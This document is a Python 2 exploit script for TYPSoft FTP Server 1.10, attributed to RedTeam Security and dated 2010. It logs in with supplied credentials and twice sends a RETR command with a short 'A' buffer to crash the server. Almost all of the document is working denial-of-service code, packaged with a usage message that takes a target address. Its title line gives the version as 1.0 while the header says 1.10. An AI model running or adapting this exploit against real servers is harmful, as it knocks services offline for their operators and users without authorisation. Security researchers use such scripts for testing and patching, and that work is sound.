TYPSoft version 1.0 RETR command denial of service exploit.
9e743870310a319983612a510077f27e93555ce348bf5017ef067515f6ee954b
# Exploit Title: TYPSoft FTP Server 1.10 RETR Command DoS
# Date: 5/13/2010
# Author: Jeremiah Talamantes (RedTeam Security)
# Software Link: http://sourceforge.net/projects/ftpserv/
# Version: 1.10
# Tested on: Windows XP, SP2 (EN)
# DESCRIPTION:
# This script exploits a weakness in the RETR command in TYPSoft v1.10
# It requires only a small buffer that is executed in succession within
# the same socket connection.
#!/usr/bin/python
print "\n#################################################################"
print "## RedTeam Security ##"
print "## TYPSoft FTP Server v1.10 RETR Command DoS ##"
print "## ##"
print "## Jeremiah Talamantes ##"
print "## labs@redteamsecure.com ##"
print "################################################################# \n"
import socket
import sys
# Define the exploit's usage
def Usage():
print ("Usage: scriptname.py <IP address> <username> <password>\n")
print ("\n\nCredit: Jeremiah Talamantes")
print ("RedTeam Security : www.redteamsecure.com/labs\n")
# Buffer settings
# This works with a relatively small buffer
buffer= "A" * 30
def start(hostname, username, password):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("Error: unable to connect to host")
sys.exit(1)
r=sock.recv(1024)
print "[+] " + r
#Send username to server
sock.send("USER %s\r\n" %username)
r=sock.recv(1024)
# Send password to server
sock.send("PASS %s\r\n" %password)
r=sock.recv(1024)
print "Sending the malicious chars..."
# Send data to server
sock.send("RETR %s\r\n" %buffer)
# Repeat to overflow
sock.send("USER %s\r\n" %username)
r=sock.recv(1024)
sock.send("PASS %s\r\n" %password)
r=sock.recv(1024)
sock.send("RETR %s\r\n" %buffer)
sock.close()
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
password=sys.argv[3]
start(hostname,username,password)
sys.exit(0)
# end